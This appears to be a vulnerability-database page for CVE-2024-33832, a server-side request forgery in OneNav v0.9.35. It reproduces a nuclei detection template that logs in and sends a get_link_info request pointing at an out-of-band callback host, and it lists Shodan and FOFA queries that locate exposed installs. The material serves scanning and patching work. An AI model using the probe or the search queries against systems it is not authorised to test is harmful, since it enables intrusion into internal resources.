Lucene search
K

OneNav v0.9.35-20240318 - Server-Side Request Forgery (SSRF)

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

OneNav v0.9.35-20240318 has a medium severity SSRF vulnerability via get_link_info API url parameter.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-33832
17 Jul 202511:51
circl
CNNVD
OneNav 安全漏洞
30 Apr 202400:00
cnnvd
CVE
CVE-2024-33832
30 Apr 202400:00
cve
Cvelist
CVE-2024-33832
30 Apr 202400:00
cvelist
NVD
CVE-2024-33832
30 Apr 202418:15
nvd
OSV
CVE-2024-33832
30 Apr 202418:15
osv
Positive Technologies
PT-2024-25503 · Onenav · Onenav
30 Apr 202400:00
ptsecurity
RedhatCVE
CVE-2024-33832
23 May 202506:24
redhatcve
Vulnrichment
CVE-2024-33832
30 Apr 202400:00
vulnrichment
id: CVE-2024-33832

info:
  name: OneNav v0.9.35-20240318 - Server-Side Request Forgery (SSRF)
  author: ritikchaddha
  severity: medium
  description: |
    OneNav v0.9.35-20240318 is vulnerable to server-side request forgery (SSRF) via the url parameter in the get_link_info API. An attacker can force the server to make arbitrary requests, potentially accessing internal resources.
  impact: |
    Authenticated attackers can force the server to make arbitrary requests via the url parameter in the get_link_info API.
  remediation: |
    Update OneNav to a version later than v0.9.35-20240318 that patches the SSRF vulnerability.
  reference:
    - https://github.com/Hebing123/cve/issues/39
    - https://nvd.nist.gov/vuln/detail/CVE-2024-33832
  classification:
    epss-score: 0.0072
    epss-percentile: 0.49428
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.5
    cve-id: CVE-2024-33832
    cwe-id: CWE-918
  metadata:
    max-request: 2
    product: onenav
    fofa-query: icon_hash="1111283449"
    shodan-query: http.favicon.hash:1111283449
  tags: cve,cve2024,ssrf,onenav,oast,authenticated,vuln

http:
  - raw:
      - |
        POST /index.php?c=login&check=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        user={{username}}&password={{password}}

      - |
        POST /index.php?c=api&method=get_link_info HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        url=http://{{interactsh-url}}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - 'title":'
          - 'description":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"
# digest: 490a0046304402205ec973245f89c2b4078ddc219b8e20e1e19f9fd422b95e5e1afeba0ceb6e1bff02200d9a8415ab8dbd139ef26f345ddbbb1c8ee5a979e67544a495c7fbac4d227186:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.16.3
EPSS0.0072
SSVC
13